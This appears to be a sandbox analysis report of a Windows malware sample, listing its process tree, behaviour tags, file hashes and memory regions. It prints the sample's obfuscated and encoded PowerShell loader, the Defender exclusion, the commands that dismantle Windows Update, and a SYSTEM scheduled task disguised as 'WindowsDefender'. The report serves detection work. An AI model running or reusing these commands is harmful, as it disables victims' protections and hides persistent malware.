C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9b4fc216-1b04-4d98-b1a8-a3ded48a75e8}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1be567e1-ef9d-452a-85f6-f090b79afa0f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Drops file in System32 directory
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe"4⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1812053344-13137603341849279054-1531867791-656927532-20069545481267294742-548096435"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "839481360133411535821229599271760285217258247492-1329421035-1391618268-750026042"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13252671841248405139-361477564-16641125891446698982-1774112245-1399625881-1956927623"1⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""1⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5323e8df3b89ceb56c3b58f90590ead74
SHA1662816f60c95bf7645d1066161cfafcd06c92bed
SHA25637149b2a9d459e47e45c4bfd3d72672610f201901823ebf0a148b0fe451c9880
SHA512f2250550de665fbaa72b739e9f8b8e1141417c19805fec6890776953f343ef33bf6f2d2100e4ed783a98e6f27f7772e022bd7c9760a8e63d8941f83f9f3da8d1
-
C:\Windows\Tasks\dialersvc64.jobFilesize
1KB
MD59c743d777b2f19c0d5b68b005b96213b
SHA18da55b4a8fe31ae8a7179e8298a132fad8df547e
SHA2562a57786c250c49f3df77c0c0a3e06833d9006261fd58461d87813753780480d0
SHA512e7e5bf6e46008c8502a63b2be1873115a5c2b45ea42c09c2164b9507aa66739fef76119a2b0547cc2b20b3bee339fb299ed15d13a8d4a35dbbff6069d9771c19
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
\Users\Admin\AppData\Roaming\33AF.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Windows\System32\config\systemprofile\AppData\Roaming\1C19.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/284-184-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/284-248-0x0000000000AE0000-0x0000000000B0A000-memory.dmpFilesize
168KB
-
memory/284-186-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/288-291-0x0000000000230000-0x000000000025A000-memory.dmpFilesize
168KB
-
memory/300-385-0x0000000000000000-mapping.dmp
-
memory/320-99-0x0000000000000000-mapping.dmp
-
memory/328-188-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/328-250-0x0000000001CB0000-0x0000000001CDA000-memory.dmpFilesize
168KB
-
memory/328-252-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/420-129-0x0000000000930000-0x0000000000953000-memory.dmpFilesize
140KB
-
memory/420-146-0x0000000000A00000-0x0000000000A2A000-memory.dmpFilesize
168KB
-
memory/420-134-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/420-142-0x0000000000930000-0x0000000000953000-memory.dmpFilesize
140KB
-
memory/420-136-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/464-151-0x00000000000E0000-0x000000000010A000-memory.dmpFilesize
168KB
-
memory/464-141-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/464-138-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/472-84-0x0000000000000000-mapping.dmp
-
memory/480-143-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/480-147-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/480-240-0x0000000000200000-0x000000000022A000-memory.dmpFilesize
168KB
-
memory/488-155-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/488-157-0x0000000000140000-0x000000000016A000-memory.dmpFilesize
168KB
-
memory/488-152-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/552-347-0x0000000000000000-mapping.dmp
-
memory/568-317-0x0000000000000000-mapping.dmp
-
memory/576-105-0x0000000000000000-mapping.dmp
-
memory/600-158-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/600-160-0x00000000004D0000-0x00000000004FA000-memory.dmpFilesize
168KB
-
memory/600-162-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/676-243-0x00000000003E0000-0x000000000040A000-memory.dmpFilesize
168KB
-
memory/676-165-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/676-167-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/700-78-0x0000000000000000-mapping.dmp
-
memory/748-59-0x000007FEFBC61000-0x000007FEFBC63000-memory.dmpFilesize
8KB
-
memory/748-54-0x000000001BBC0000-0x000000001C092000-memory.dmpFilesize
4.8MB
-
memory/748-55-0x0000000000180000-0x0000000000186000-memory.dmpFilesize
24KB
-
memory/748-56-0x00000000001F0000-0x00000000006C2000-memory.dmpFilesize
4.8MB
-
memory/748-87-0x00000000008E0000-0x00000000008EA000-memory.dmpFilesize
40KB
-
memory/748-57-0x000000001C090000-0x000000001C544000-memory.dmpFilesize
4.7MB
-
memory/748-58-0x0000000000190000-0x0000000000196000-memory.dmpFilesize
24KB
-
memory/756-260-0x0000000000120000-0x000000000014A000-memory.dmpFilesize
168KB
-
memory/756-261-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/760-168-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/760-170-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/760-244-0x00000000009F0000-0x0000000000A1A000-memory.dmpFilesize
168KB
-
memory/776-301-0x0000000000000000-mapping.dmp
-
memory/780-70-0x0000000000000000-mapping.dmp
-
memory/780-299-0x0000000000000000-mapping.dmp
-
memory/820-245-0x0000000000300000-0x000000000032A000-memory.dmpFilesize
168KB
-
memory/820-174-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/820-178-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/836-377-0x0000000000000000-mapping.dmp
-
memory/844-81-0x0000000000000000-mapping.dmp
-
memory/860-246-0x0000000000320000-0x000000000034A000-memory.dmpFilesize
168KB
-
memory/860-175-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/860-177-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/872-80-0x0000000000000000-mapping.dmp
-
memory/884-182-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/884-247-0x0000000000C40000-0x0000000000C6A000-memory.dmpFilesize
168KB
-
memory/884-180-0x000007FEBD710000-0x000007FEBD720000-memory.dmpFilesize
64KB
-
memory/912-66-0x000000000285B000-0x000000000287A000-memory.dmpFilesize
124KB
-
memory/912-64-0x0000000002854000-0x0000000002857000-memory.dmpFilesize
12KB
-
memory/912-65-0x000000000285B000-0x000000000287A000-memory.dmpFilesize
124KB
-
memory/912-63-0x000007FEED350000-0x000007FEEDEAD000-memory.dmpFilesize
11.4MB
-
memory/912-60-0x0000000000000000-mapping.dmp
-
memory/980-316-0x0000000000000000-mapping.dmp
-
memory/1016-305-0x0000000000250000-0x000000000027A000-memory.dmpFilesize
168KB
-
memory/1016-101-0x0000000000000000-mapping.dmp
-
memory/1016-69-0x0000000000000000-mapping.dmp
-
memory/1016-296-0x0000000000000000-mapping.dmp
-
memory/1028-353-0x0000000000000000-mapping.dmp
-
memory/1032-100-0x0000000000000000-mapping.dmp
-
memory/1036-303-0x0000000000000000-mapping.dmp
-
memory/1040-67-0x0000000000000000-mapping.dmp
-
memory/1056-253-0x0000000000380000-0x00000000003AA000-memory.dmpFilesize
168KB
-
memory/1056-254-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/1088-73-0x0000000000000000-mapping.dmp
-
memory/1092-262-0x00000000004B0000-0x00000000004DA000-memory.dmpFilesize
168KB
-
memory/1092-264-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/1136-238-0x0000000000780000-0x00000000007AA000-memory.dmpFilesize
168KB
-
memory/1148-255-0x0000000001C80000-0x0000000001CAA000-memory.dmpFilesize
168KB
-
memory/1180-268-0x0000000000A00000-0x0000000000A2A000-memory.dmpFilesize
168KB
-
memory/1192-83-0x0000000000000000-mapping.dmp
-
memory/1196-79-0x0000000000000000-mapping.dmp
-
memory/1216-302-0x0000000000000000-mapping.dmp
-
memory/1220-68-0x0000000000000000-mapping.dmp
-
memory/1224-371-0x0000000000000000-mapping.dmp
-
memory/1236-82-0x0000000000000000-mapping.dmp
-
memory/1248-257-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/1248-256-0x00000000001F0000-0x000000000021A000-memory.dmpFilesize
168KB
-
memory/1276-259-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/1276-258-0x0000000002990000-0x00000000029BA000-memory.dmpFilesize
168KB
-
memory/1356-96-0x0000000000000000-mapping.dmp
-
memory/1360-98-0x0000000000000000-mapping.dmp
-
memory/1400-329-0x0000000000000000-mapping.dmp
-
memory/1432-94-0x0000000000000000-mapping.dmp
-
memory/1440-85-0x0000000000000000-mapping.dmp
-
memory/1444-112-0x0000000075B11000-0x0000000075B13000-memory.dmpFilesize
8KB
-
memory/1444-119-0x0000000074000000-0x00000000745AB000-memory.dmpFilesize
5.7MB
-
memory/1444-237-0x00000000775C0000-0x0000000077740000-memory.dmpFilesize
1.5MB
-
memory/1444-234-0x0000000074000000-0x00000000745AB000-memory.dmpFilesize
5.7MB
-
memory/1444-341-0x0000000000000000-mapping.dmp
-
memory/1444-154-0x00000000775C0000-0x0000000077740000-memory.dmpFilesize
1.5MB
-
memory/1444-110-0x0000000000000000-mapping.dmp
-
memory/1452-365-0x0000000000000000-mapping.dmp
-
memory/1480-95-0x0000000000000000-mapping.dmp
-
memory/1484-267-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/1484-269-0x00000000775C0000-0x0000000077740000-memory.dmpFilesize
1.5MB
-
memory/1484-242-0x00000000003B0000-0x00000000003D1000-memory.dmpFilesize
132KB
-
memory/1484-241-0x00000000001C0000-0x00000000001DB000-memory.dmpFilesize
108KB
-
memory/1484-224-0x00000000004039E0-mapping.dmp
-
memory/1508-300-0x0000000000000000-mapping.dmp
-
memory/1516-74-0x0000000000000000-mapping.dmp
-
memory/1588-89-0x0000000140001844-mapping.dmp
-
memory/1608-104-0x0000000000000000-mapping.dmp
-
memory/1608-72-0x0000000000000000-mapping.dmp
-
memory/1608-391-0x0000000000000000-mapping.dmp
-
memory/1624-315-0x0000000000000000-mapping.dmp
-
memory/1644-90-0x0000000000000000-mapping.dmp
-
memory/1656-289-0x0000000000B80000-0x0000000000BAA000-memory.dmpFilesize
168KB
-
memory/1656-288-0x0000000001404000-0x0000000001407000-memory.dmpFilesize
12KB
-
memory/1656-287-0x00000000001C0000-0x00000000001EA000-memory.dmpFilesize
168KB
-
memory/1656-290-0x000000000140B000-0x000000000142A000-memory.dmpFilesize
124KB
-
memory/1656-277-0x0000000000000000-mapping.dmp
-
memory/1672-75-0x0000000000000000-mapping.dmp
-
memory/1688-103-0x0000000000000000-mapping.dmp
-
memory/1696-122-0x00000001400033F4-mapping.dmp
-
memory/1696-128-0x00000000772C0000-0x00000000773DF000-memory.dmpFilesize
1.1MB
-
memory/1696-140-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1696-121-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1696-149-0x00000000773E0000-0x0000000077589000-memory.dmpFilesize
1.7MB
-
memory/1696-266-0x00000000002D0000-0x00000000002FA000-memory.dmpFilesize
168KB
-
memory/1696-124-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1696-126-0x00000000773E0000-0x0000000077589000-memory.dmpFilesize
1.7MB
-
memory/1708-304-0x0000000019980000-0x00000000199AA000-memory.dmpFilesize
168KB
-
memory/1724-318-0x0000000000610000-0x000000000063A000-memory.dmpFilesize
168KB
-
memory/1752-77-0x0000000000000000-mapping.dmp
-
memory/1780-93-0x0000000000000000-mapping.dmp
-
memory/1792-117-0x000000000119B000-0x00000000011BA000-memory.dmpFilesize
124KB
-
memory/1792-132-0x00000000772C0000-0x00000000773DF000-memory.dmpFilesize
1.1MB
-
memory/1792-127-0x000000000119B000-0x00000000011BA000-memory.dmpFilesize
124KB
-
memory/1792-118-0x00000000773E0000-0x0000000077589000-memory.dmpFilesize
1.7MB
-
memory/1792-109-0x0000000000000000-mapping.dmp
-
memory/1792-113-0x000007FEF4280000-0x000007FEF4CA3000-memory.dmpFilesize
10.1MB
-
memory/1792-120-0x00000000772C0000-0x00000000773DF000-memory.dmpFilesize
1.1MB
-
memory/1792-116-0x0000000001194000-0x0000000001197000-memory.dmpFilesize
12KB
-
memory/1792-125-0x0000000001194000-0x0000000001197000-memory.dmpFilesize
12KB
-
memory/1792-114-0x000007FEF3720000-0x000007FEF427D000-memory.dmpFilesize
11.4MB
-
memory/1792-335-0x0000000000000000-mapping.dmp
-
memory/1792-130-0x00000000773E0000-0x0000000077589000-memory.dmpFilesize
1.7MB
-
memory/1836-410-0x0000000000000000-mapping.dmp
-
memory/1848-86-0x0000000000000000-mapping.dmp
-
memory/1896-102-0x0000000000000000-mapping.dmp
-
memory/1900-76-0x0000000000000000-mapping.dmp
-
memory/1904-92-0x0000000000000000-mapping.dmp
-
memory/1940-359-0x0000000000000000-mapping.dmp
-
memory/1948-71-0x0000000000000000-mapping.dmp
-
memory/2000-263-0x00000000007D0000-0x00000000007FA000-memory.dmpFilesize
168KB
-
memory/2000-265-0x0000000037420000-0x0000000037430000-memory.dmpFilesize
64KB
-
memory/2016-107-0x0000000000000000-mapping.dmp
-
memory/2044-97-0x0000000000000000-mapping.dmp